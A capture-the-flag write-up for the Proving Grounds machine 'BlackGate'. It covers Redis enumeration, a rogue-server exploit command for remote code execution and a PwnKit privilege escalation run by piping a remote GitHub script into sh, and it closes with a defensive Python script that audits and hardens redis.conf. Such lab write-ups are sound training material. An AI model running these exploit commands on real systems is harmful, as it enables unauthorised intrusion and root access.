BlackGate
Source: Proving Grounds
OS: Linux
Community Rating: Intermediate
Enumeration & Reconnaissance
I started with autorecon which found:
SSH (22)
REDIS (6379)
Not the usual HTTP…
Service Analysis
I opened port 6379 in my web browser and received the message: "-ERR wrong number of arguments for 'get' command"

I kept poking around for a while, then searched for CVEs. I found one that provided RCE by creating a rogue Redis server.
Gaining Initial Access
I got the PoC and ran it a few times before it successfully gave me a shell:
python redis-rogue-server.py --rhost 192.168.192.176 --lhost 192.168.45.201

Privilege Escalation
While I was in, I tried to look for privilege escalation vectors. I started with the basics. Running
sudo -l
revealed that /usr/local/bin/redis-status could be run as root without a password. However, I couldn't find a known exploit, and I couldn't run it since it requires an Authorization Key.

I then checked other things like cron tabs, kernel exploits, SUIDs, etc., but nothing worked.
There were multiple articles about a way to exploit Redis by adding SSH keys to the authorized keys directory. I dived into this for a while before I called it off. I then went through the list of CVEs that linpeas showed.

The first one I tried (CVE-2021-3490) didn’t work, but then when I tried CVE-2021-4034 it worked right away. I just had to run:
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
and I got root.

Lessons Learned
Running a rogue server can turn a misconfigured Redis instance into an RCE vector.
When the first candidate CVE fails, working through the others an enumeration tool lists can still reveal the privilege escalation path.
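As an added defender-side example (not code from this writeup), the following Python check runs against a constructed redis.conf, flags the settings that leave a Redis instance open to any network client (the precondition for the rogue-server technique above), and appends the hardened directives; the sample config, the `audit`/`harden` helper names and the `<strong-password>` value are placeholders for this example.

```python
# Added example: audit a redis.conf for settings that let any network client drive the
# instance. Checks follow Redis's own guidance (bind, protected-mode, requirepass, rename-command).

WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
# requirepass deliberately left unset in this constructed sample
"""

# Commands that let a remote client reconfigure the server or load code; renaming to "" disables them.
DANGEROUS_COMMANDS = ("SLAVEOF", "REPLICAOF", "MODULE", "CONFIG", "DEBUG")


def parse_conf(text):
    """Return (settings, disabled): last value per directive, and commands renamed to ""."""
    settings, disabled = {}, set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key == "rename-command":
            cmd, _, new_name = value.partition(" ")
            if new_name.strip().strip('"') == "":
                disabled.add(cmd.upper())
        else:
            settings[key] = value
    return settings, disabled


def audit(text):
    """Return (finding, recommended directive) pairs; an empty list means hardened."""
    settings, disabled = parse_conf(text)
    findings = []
    bind = settings.get("bind", "").split()
    if not bind or any(b in ("0.0.0.0", "::", "*") for b in bind):  # no bind = all interfaces
        findings.append(("listens on all interfaces", "bind 127.0.0.1"))
    if settings.get("protected-mode", "yes").lower() != "yes":
        findings.append(("protected mode disabled", "protected-mode yes"))
    if not settings.get("requirepass"):
        findings.append(("no authentication required", "requirepass <strong-password>"))
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in disabled:
            findings.append((f"{cmd} reachable by any client", f'rename-command {cmd} ""'))
    return findings


def harden(text):
    """Append each recommended directive; later directives override earlier ones in Redis."""
    return text.rstrip("\n") + "\n" + "\n".join(fix for _, fix in audit(text)) + "\n"
```

Running `audit(harden(WEAK_CONF))` returns an empty list, so the same check doubles as a regression test for the hardened file.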